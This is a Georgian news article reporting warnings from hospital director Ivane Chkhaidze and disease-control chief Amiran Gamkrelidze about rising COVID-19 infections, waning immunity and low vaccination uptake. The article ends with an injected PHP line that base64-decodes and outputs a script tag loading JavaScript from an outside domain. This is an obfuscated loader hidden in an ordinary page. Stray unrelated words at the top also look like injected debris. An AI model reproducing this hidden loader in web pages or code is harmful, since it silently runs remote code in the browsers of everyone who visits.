celsiusi
ავერსი შნაიდერი
“საქართველოში, ინფიცირების ყველაზე მაღალი მაჩვენებელი, იანვარი-მარტის პერიოდში გვქონდა, შესაბამისად, უკვე გასულია 5 თვეა, რაც იმას ნიშნავს, რომ მოსახლეობის აბსოლუტურ უმრავლესობას გადატანილი დაავადება უკვე აღარ იცავს. შედეგიც სახეზეა, ინფიცირების მატების ტემპი 2-3-ჯერ მაღალია, ვიდრე გვქონდა 2-3 კვირის წინ და მოსალოდნელია შემდეგი კვირების განმავლობაში ეს მაჩვენებელი კიდევ უფრო მეტად გაიზარდოს,” - ამის შესახებ იაშვილის სახელობის ბავშვთა ცენტრალური საავადმყოფოს კლინიკურმა დირექტორმა ივანე ჩხაიძემ განაცხადა.
 
ივანე ჩხაიძე ორ მთავარ ფაქტორს ასახელებს, რამაც ბოლო პერიოდში ინფიცირების შემთხვევების მატება განაპირობა.
 
"დახრულ სივრცეში ნიღნის ტარების ვალდებულების არარსებობა და ტურისტების რაოდენობის ზრდა".  
 
მისივე თქმით, მიუხედავად იმისა, რომ ქვეყანაში შეუზღუდავი რაოდენობის, საუკეთესო ვაქცინა, ფაიზერი გვაქვს, იმუნიზაციის მაჩვენებელი მაინც ძალიან დაბალია.
 
“დღევანდელი მაჩვენებლები საგანგაშო არაა, თუმცა საგანგაშოა ტენდენცია. თუ შემდეგი კვირის მანძილზე დაინფიცირებულთა რიცხვი მოიმატებს, საჭირო გახდება იმუნიზაციის საბჭოს შეკრება,” - ამბობს ივანე ჩხაიძე.
 
შეგახსენებთ, დაავადებათა კონტროლის ეროვნული ცენტრის დირექტორის, ამირან გამყრელიძის ინფორმაციით, ბოლო სამი კვირის განმავლობაში საქართველოში და მსოფლიოში კორონავირუსის შემთხვევათა რაოდენობის ზრდა ფიქსირდება. მისი თქმით, ცირკულირებს B1 და B5 შტამი, რომელიც ნაკლებად აგრესიულია, თუმცა მაღალი გადამდებობით ხასიათდება. გაყრელიძე მოსახლეობას აცრისკენ და დახურულ სივრცეებში პირბადის გამოყენებისკენ მოუწოდებს.
 
აღსანიშნია, რომ (5 ივლისის სტატისტიკა) ბოლო 2 კვირის განმავლობაში საქართველოში კოვიდ ინფიცირების შემთხვევების რაოდენობა გაორმაგდა. ბოლო 7 დღის განმავლობაში ქვეყანაში 2550 აქტიური შემთხვევა ფიქსირდება. დადებითობის მაჩვენებელი კი 4%-ს აჭარბებს.
 
570
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");